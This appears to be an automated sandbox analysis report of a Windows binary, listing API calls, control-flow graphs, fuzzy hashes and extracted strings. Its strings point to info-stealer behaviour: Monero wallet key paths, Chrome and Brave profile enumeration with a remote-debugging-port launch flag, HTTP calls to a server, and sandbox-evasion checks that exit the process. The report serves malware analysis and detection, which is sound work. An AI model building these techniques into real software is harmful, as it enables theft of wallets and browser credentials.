                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6D6A
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EB6D88
                                • CloseHandle.KERNEL32(00000000), ref: 00EB6D99
                                • Sleep.KERNEL32(00001770), ref: 00EB6DA4
                                • CloseHandle.KERNEL32(?,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6DBA
                                • ExitProcess.KERNEL32 ref: 00EB6DC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: 71d76d088af8cf2b54b7bd9f390a5b5e82f4dbc7b2885b295a2c271c4dfb4c43
                                • Instruction ID: b251a6d11e34ca4d6790c3b32fb7ab64290db68f25bbd9d24dcd982acd16f83f
                                • Opcode Fuzzy Hash: 71d76d088af8cf2b54b7bd9f390a5b5e82f4dbc7b2885b295a2c271c4dfb4c43
                                • Instruction Fuzzy Hash: 7131FA31A10204AADF04F7E0D897BEF77B9AF54300F586978F12276182EF7469458BA2

                                Control-flow Graph

                                 Control-flow graph (text form of the graph image; basic blocks with their calls, then edges):
                                 • 1436: eb6d93
                                 • 1437: eb6daa
                                 • 1439: eb6d5a-eb6d77, call ebade0, OpenEventA
                                 • 1440: eb6dac-eb6dc2, call eb6bc0, call eb5d60, CloseHandle, ExitProcess
                                 • 1446: eb6d79-eb6d91, call ebade0, CreateEventA
                                 • 1447: eb6d95-eb6da4, CloseHandle, Sleep
                                 • Edges: 1436->1437, 1437->1439, 1437->1440, 1439->1446, 1439->1447, 1446->1440, 1447->1437
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6D6A
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EB6D88
                                • CloseHandle.KERNEL32(00000000), ref: 00EB6D99
                                • Sleep.KERNEL32(00001770), ref: 00EB6DA4
                                • CloseHandle.KERNEL32(?,00000000,?,01BF9DB8,?,00EC10F4,?,00000000,?,00EC10F8,?,00000000,00EC0AF3), ref: 00EB6DBA
                                • ExitProcess.KERNEL32 ref: 00EB6DC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 0c8a062e690da293c28f855c9d6998a87f007f0d0f26c07becef762ac4c2fbb9
                                • Instruction ID: 2ea10f9427571b6168066df0d7d4e9ba4c0ff0aa32240fc14953c90e0ddd1dac
                                • Opcode Fuzzy Hash: 0c8a062e690da293c28f855c9d6998a87f007f0d0f26c07becef762ac4c2fbb9
                                • Instruction Fuzzy Hash: 0DF05830A44209ABEF24BBA0EC0ABFF33B4AF04705F142935F622B52C4CBB45540CBA1

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 53e8b5d1ed08c606de41d1c28f0ede9c5f52086e6dc4d1341cc0206bdeb1c2eb
                                • Instruction ID: 107f3ac1edca3fd1b438ef42b2e74863775ab40b01468a689db85bba1b29d582
                                • Opcode Fuzzy Hash: 53e8b5d1ed08c606de41d1c28f0ede9c5f52086e6dc4d1341cc0206bdeb1c2eb
                                • Instruction Fuzzy Hash: D2211FB1D00209ABDF14DFA4E845ADE7BB5FB45321F148625F925B72C0DB706A05CF91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA62D0: InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                  • Part of subcall function 00EA62D0: StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                  • Part of subcall function 00EA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                  • Part of subcall function 00EA62D0: HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                  • Part of subcall function 00EA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                  • Part of subcall function 00EA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5478
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: bce14c8951fd7aefa14c10fd0c49c5f719be267d7d41eb62db877d4c9b473718
                                • Instruction ID: 0f3a818355827205b56ad764187950be41e5348766fd16f65252b329d19b6aea
                                • Opcode Fuzzy Hash: bce14c8951fd7aefa14c10fd0c49c5f719be267d7d41eb62db877d4c9b473718
                                • Instruction Fuzzy Hash: 4411EF31910108AACF14FF64D992AEE73B99F54340F445578E91A7A592EB30AB05C691

                                Control-flow Graph

                                 Control-flow graph (text form of the graph image; basic blocks with their calls, then edges):
                                 • 1493: ea1220-ea1247, call eb8b40, GlobalMemoryStatusEx
                                 • 1496: ea1249-ea1271, call ebdd30 * 2
                                 • 1497: ea1273-ea127a
                                 • 1498: ea1281-ea1285
                                 • 1500: ea129a-ea129d
                                 • 1501: ea1287
                                 • 1503: ea1289-ea1290
                                 • 1504: ea1292-ea1294, ExitProcess
                                 • Edges: 1493->1496, 1493->1497, 1496->1498, 1497->1498, 1498->1500, 1498->1501, 1501->1503, 1501->1504, 1503->1500, 1503->1504
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EA123E
                                • ExitProcess.KERNEL32 ref: 00EA1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 924c4949ada31f3684270fe38c3f077e3d72c9f7691d4f941d2c45842662c67c
                                • Instruction ID: 87cedb9a619a2198a6b1f4fb33b7417040aedc8abed72fea1676411e51ea7a86
                                • Opcode Fuzzy Hash: 924c4949ada31f3684270fe38c3f077e3d72c9f7691d4f941d2c45842662c67c
                                • Instruction Fuzzy Hash: 850162B0D44308BAEF10DFE0DD4AB9EB7B8EB14705F145498E604BA2D0D674A5419769
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 9702e4e9ed714b10dc46a1fd0e2e8396b54d1b26aea42497f1d955a962e0a22c
                                • Instruction ID: 11ebe3a871f870b6a50bd6bbb8e1027f4a369ed7f6762d32d6a35f3664ba7317
                                • Opcode Fuzzy Hash: 9702e4e9ed714b10dc46a1fd0e2e8396b54d1b26aea42497f1d955a962e0a22c
                                • Instruction Fuzzy Hash: BF01ADB1A08309ABC714CF88D949BEFBBB8FB44710F10022AF551F2780D7B45A008BA1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EA112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EA1132
                                • ExitProcess.KERNEL32 ref: 00EA1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 9e46fba198e00a99f3538a15d1d82ffe3ebec8626b56ee578ae6eaa8931d67d2
                                • Instruction ID: f64fb47748b1664cb885fea570a08df316d7bf422f079ef4828512cb715323ba
                                • Opcode Fuzzy Hash: 9e46fba198e00a99f3538a15d1d82ffe3ebec8626b56ee578ae6eaa8931d67d2
                                • Instruction Fuzzy Hash: A5E0CD7094530CFFE7246BA0DC0EB0C767C9B08B05F1000A4F7187A2C0C6F436804758
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EA10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EA10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 128c938291ecaa2ee7b3eea3254385911fd443b3039a6c1aa4989c722162477c
                                • Instruction ID: 40330c267aa8feeb1e3e3e70b1fa8a327a0ab56079a8a1add3afaf2ac97def9e
                                • Opcode Fuzzy Hash: 128c938291ecaa2ee7b3eea3254385911fd443b3039a6c1aa4989c722162477c
                                • Instruction Fuzzy Hash: F9F08971641214BBE7189AB4AC99FAFB7ECE705705F301454F544E7380D571AE40D7A4
                                APIs
                                  • Part of subcall function 00EB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                  • Part of subcall function 00EB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                  • Part of subcall function 00EB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                  • Part of subcall function 00EB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                  • Part of subcall function 00EB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                  • Part of subcall function 00EB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                • ExitProcess.KERNEL32 ref: 00EA11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: ac5bcf4dfad4a5e9f947939e965ff27ec4a3595034a84b6e725369414b0e1187
                                • Instruction ID: aa8a03af817a267b3eda86db86da480e302722d8196f2cb9e09f67461c95b9fe
                                • Opcode Fuzzy Hash: ac5bcf4dfad4a5e9f947939e965ff27ec4a3595034a84b6e725369414b0e1187
                                • Instruction Fuzzy Hash: 57E0C7B990030153DE2473B0BC0BBAB36EC4B6938EF002824FA08B2742FE20F8418721
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00EC0B32,00EC0B2F,00000000,?,?,?,00EC1450,00EC0B2E), ref: 00EABEC5
                                • StrCmpCA.SHLWAPI(?,00EC1454), ref: 00EABF33
                                • StrCmpCA.SHLWAPI(?,00EC1458), ref: 00EABF49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAC8A9
                                • FindClose.KERNEL32(000000FF), ref: 00EAC8BB
                                Strings
                                • Google Chrome, xrefs: 00EAC6F8
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC495
                                • Preferences, xrefs: 00EAC104
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC3B2
                                • \Brave\Preferences, xrefs: 00EAC1C1
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC534
                                • Brave, xrefs: 00EAC0E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-1869280968
                                • Opcode ID: 3bcf169285b89c0fd0d2d436ab7db801f022eaf09b87cffec732e96b71c8e565
                                • Instruction ID: 9c566b16124298587233dd6c8d351a10a3ee9bcdfd07ec54ed2245e8375737a3
                                • Opcode Fuzzy Hash: 3bcf169285b89c0fd0d2d436ab7db801f022eaf09b87cffec732e96b71c8e565
                                • Instruction Fuzzy Hash: 0E520072910108ABCF14FB60DD96EEF73BDAB55304F4455B8B51A76181EE30AB48CFA2
                                APIs
                                • wsprintfA.USER32 ref: 00EB3B1C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB3B33
                                • lstrcat.KERNEL32(?,?), ref: 00EB3B85
                                • StrCmpCA.SHLWAPI(?,00EC0F58), ref: 00EB3B97
                                • StrCmpCA.SHLWAPI(?,00EC0F5C), ref: 00EB3BAD
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB3EB7
                                • FindClose.KERNEL32(000000FF), ref: 00EB3ECC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f3ffc7df8987b3174f791be060a1a508f7ac4ade7adb8671e7996543ed5e0fd2
                                • Instruction ID: ba18fc8d51fab22bf6bba736934be03d8e60c5a4c7e43160a9f20d445a647bc5
                                • Opcode Fuzzy Hash: f3ffc7df8987b3174f791be060a1a508f7ac4ade7adb8671e7996543ed5e0fd2
                                • Instruction Fuzzy Hash: C0A151B1A002089BDB34DFA4DC89FEE73B9BB49300F044599F61DA6185EB719B84CF61
                                APIs
                                • wsprintfA.USER32 ref: 00EB4B7C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                • StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
                                • StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
